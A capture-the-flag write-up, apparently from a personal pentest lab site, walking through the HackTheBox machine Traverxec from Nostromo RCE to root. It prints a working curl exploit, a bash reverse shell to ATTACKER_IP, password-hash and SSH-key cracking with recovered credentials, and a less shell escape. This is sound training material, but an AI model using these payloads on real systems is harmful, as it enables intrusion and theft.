Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

Traverxec (HTB – Easy)

Traverxec runs the vulnerable Nostromo web server, which can be exploited for remote command execution. The initial foothold is obtained via a public Nostromo RCE, followed by pivoting into the david user through configuration leakage and protected web content. Privilege escalation is achieved by abusing journalctl running in a pager (less) with root privileges.

Overview

Target: traverxec.htb
Initial vector: Nostromo 1.9.6 RCE
Lateral movement: leaked credentials → SSH key for user david
Privilege escalation: journalctl → less escape → root shell

Enumeration

Nmap:

22/tcp ssh (OpenSSH 7.9p1)
80/tcp http (nostromo 1.9.6)

The web server is Nostromo 1.9.6, which is known to be vulnerable to RCE. Searchsploit lists multiple exploits for this version.

Foothold – Nostromo 1.9.6 RCE

The exploit abuses a path traversal and command execution via a crafted URL. Example manual usage with curl: 

$ curl -s -X POST "http://traverxec.htb/.%0d./.%0d./.%0d./.%0d./.%0d./bin/sh" \
  -d "/usr/bin/id"

To get a reverse shell: 

$ curl -s -X POST "http://traverxec.htb/.%0d./.%0d./.%0d./.%0d./.%0d./bin/sh" \
  -d "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/777 0>&1'"

Listener:

$ nc -nlvp 777

A shell is obtained as the web server user, but user.txt is not yet accessible.

Lateral Movement – User david

Inspect Nostromo configuration: 

$ cd /var/nostromo/conf
$ cat nhttpd.conf

The config reveals homedirs usage, meaning user web content is served from: 

http://traverxec.htb/~david

Also in /var/nostromo/conf is a hashed password file. Crack it with John: 

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
-> david : Nowonly4me

Browse to: 

http://traverxec.htb/~david/public_www/protected-file-area

Authenticate with david / Nowonly4me and download the backup archive. Extract it: 

$ tar -xf backup-ssh-identity-files.tgz

Inside is id_rsa for user david, protected by a passphrase. Convert and crack: 

$ ssh2john id_rsa > hash2
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash2
-> hunter

SSH as david: 

$ ssh -i id_rsa david@traverxec.htb

Now user.txt is accessible.

Privilege Escalation – journalctl / less Escape

Enumerate david’s home: 

$ ls
bin

Inside bin is a script that uses journalctl with sudo (or via a wrapper). Running it drops into less pager mode. From within less, spawn a shell: 

!/bin/bash

Because journalctl is executed with elevated privileges, the spawned shell is root.

Conclusion

Traverxec is a tight chain: Nostromo RCE for initial access, configuration and web content leakage to pivot into user david, and a classic journalctl/less escape for root. It’s a great example of combining web exploitation, password cracking, and Unix privilege escalation tricks.